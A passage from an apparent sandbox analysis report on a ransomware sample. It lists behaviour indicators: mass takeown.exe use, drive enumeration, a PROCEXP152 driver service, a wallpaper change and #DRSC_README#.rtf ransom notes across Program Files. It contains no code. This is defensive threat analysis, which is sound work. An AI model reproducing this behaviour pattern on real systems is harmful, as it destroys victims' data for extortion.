behavioral2/files/0x000100000001ad6d-441.dat upx behavioral2/files/0x000100000001ad6d-443.dat upx behavioral2/files/0x000100000001ad6d-449.dat upx behavioral2/files/0x000100000001ad6d-451.dat upx behavioral2/files/0x000100000001ad6d-457.dat upx behavioral2/files/0x000100000001ad6d-459.dat upx behavioral2/files/0x000100000001ad6d-465.dat upx behavioral2/files/0x000100000001ad6d-467.dat upx behavioral2/files/0x000100000001ad6d-473.dat upx behavioral2/files/0x000100000001ad6d-475.dat upx behavioral2/files/0x000100000001ad6d-481.dat upx behavioral2/files/0x000100000001ad6d-483.dat upx behavioral2/files/0x000100000001ad6d-489.dat upx behavioral2/files/0x000100000001ad6d-491.dat upx behavioral2/files/0x000100000001ad6d-497.dat upx behavioral2/files/0x000100000001ad6d-499.dat upx behavioral2/files/0x000100000001ad6d-505.dat upx behavioral2/files/0x000100000001ad6d-507.dat upx behavioral2/files/0x000100000001ad6d-513.dat upx behavioral2/files/0x000100000001ad6d-515.dat upx behavioral2/files/0x000100000001ad6d-521.dat upx behavioral2/files/0x000100000001ad6d-523.dat upx behavioral2/files/0x000100000001ad6d-529.dat upx behavioral2/files/0x000100000001ad6d-531.dat upx behavioral2/files/0x000100000001ad6d-537.dat upx behavioral2/files/0x000100000001ad6d-539.dat upx behavioral2/files/0x000100000001ad6d-545.dat upx behavioral2/files/0x000100000001ad6d-547.dat upx behavioral2/files/0x000100000001ad6d-553.dat upx behavioral2/files/0x000100000001ad6d-555.dat upx -
Modifies file permissions 1 TTPs 67 IoCs
pid Process 4292 takeown.exe 4676 takeown.exe 5992 takeown.exe 5528 takeown.exe 4668 takeown.exe 4692 takeown.exe 4752 takeown.exe 5428 takeown.exe 5456 takeown.exe 5860 takeown.exe 4728 takeown.exe 4568 takeown.exe 4320 takeown.exe 2368 takeown.exe 6140 takeown.exe 5252 takeown.exe 5560 takeown.exe 4956 takeown.exe 3852 takeown.exe 4696 takeown.exe 5684 takeown.exe 5452 takeown.exe 5608 takeown.exe 4316 takeown.exe 4384 takeown.exe 5832 takeown.exe 4484 takeown.exe 5784 takeown.exe 792 takeown.exe 5060 takeown.exe 4620 takeown.exe 5988 takeown.exe 5156 takeown.exe 5220 takeown.exe 5140 takeown.exe 5076 takeown.exe 4248 takeown.exe 4452 takeown.exe 5376 takeown.exe 5984 takeown.exe 5756 takeown.exe 5400 takeown.exe 6096 takeown.exe 4112 takeown.exe 4436 takeown.exe 4876 takeown.exe 3728 takeown.exe 5228 takeown.exe 5820 takeown.exe 4708 takeown.exe 5492 takeown.exe 5520 takeown.exe 4828 takeown.exe 5692 takeown.exe 5780 takeown.exe 4664 takeown.exe 4140 takeown.exe 4760 takeown.exe 5316 takeown.exe 4364 takeown.exe 6084 takeown.exe 4476 takeown.exe 4880 takeown.exe 4428 takeown.exe 3188 takeown.exe 4400 takeown.exe 5536 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 26 IoCs
description ioc Process File opened for modification C:\Users\Admin\Favorites\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Music\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Links\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Public\Music\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Public\Videos\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Public\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Public\Documents\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\M: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\H: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\B: L5BjIoLQ64.exe File opened (read-only) \??\P: L5BjIoLQ64.exe File opened (read-only) \??\R: L5BjIoLQ64.exe File opened (read-only) \??\Z: L5BjIoLQ64.exe File opened (read-only) \??\U: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\S: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\N: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\L: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\N: L5BjIoLQ64.exe File opened (read-only) \??\O: L5BjIoLQ64.exe File opened (read-only) \??\S: L5BjIoLQ64.exe File opened (read-only) \??\U: L5BjIoLQ64.exe File opened (read-only) \??\Z: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\O: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\K: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\J: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\F: L5BjIoLQ64.exe File opened (read-only) \??\J: L5BjIoLQ64.exe File opened (read-only) \??\K: L5BjIoLQ64.exe File opened (read-only) \??\W: L5BjIoLQ64.exe File opened (read-only) \??\X: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\W: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\V: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\I: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\V: L5BjIoLQ64.exe File opened (read-only) \??\X: L5BjIoLQ64.exe File opened (read-only) \??\R: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\F: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\L: L5BjIoLQ64.exe File opened (read-only) \??\Y: L5BjIoLQ64.exe File opened (read-only) \??\Q: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\H: L5BjIoLQ64.exe File opened (read-only) \??\Y: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\P: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\A: L5BjIoLQ64.exe File opened (read-only) \??\G: L5BjIoLQ64.exe File opened (read-only) \??\I: L5BjIoLQ64.exe File opened (read-only) \??\Q: L5BjIoLQ64.exe File opened (read-only) \??\T: L5BjIoLQ64.exe File opened (read-only) \??\T: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\G: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\E: 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened (read-only) \??\E: L5BjIoLQ64.exe File opened (read-only) \??\M: L5BjIoLQ64.exe -
Modifies service 2 TTPs 11 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152 L5BjIoLQ64.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\Type = "1" L5BjIoLQ64.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\Start = "3" L5BjIoLQ64.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" L5BjIoLQ64.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ErrorControl = "1" L5BjIoLQ64.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152 L5BjIoLQ64.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\N16oROhJ.bmp" reg.exe -
Drops file in Program Files directory 5652 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_forward_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\javafxpackager.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-ja_jp_2x.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\sl_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-144x144-precomposed.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_reminders_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_CopyNoDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\dd_arrow_small.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\inline-error-1x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\flags.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\bg.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_up_selected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state_1.0.1.v20140709-1414.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\s_empty_folder_state.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\zipfs.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-es_es.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_backarrow_default.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_opencarat_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\illustrations.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.text_3.5.300.v20130515-1451.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\bin\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jdwpTransport.h 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\cloud_secured.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Confirmation2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Extensions\external_extensions.json 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\home-view\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_shared.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugins\rhp\generic-rhp-app-tool-view.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lets-get-started-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\NetworkServerControl.bat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\close-2.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\info.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\org-netbeans-modules-profiler_visualvm.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-snaptracer.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_same_reviewers.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.catalog 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_checkbox_unselected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.jdp_5.5.0.165303.jar 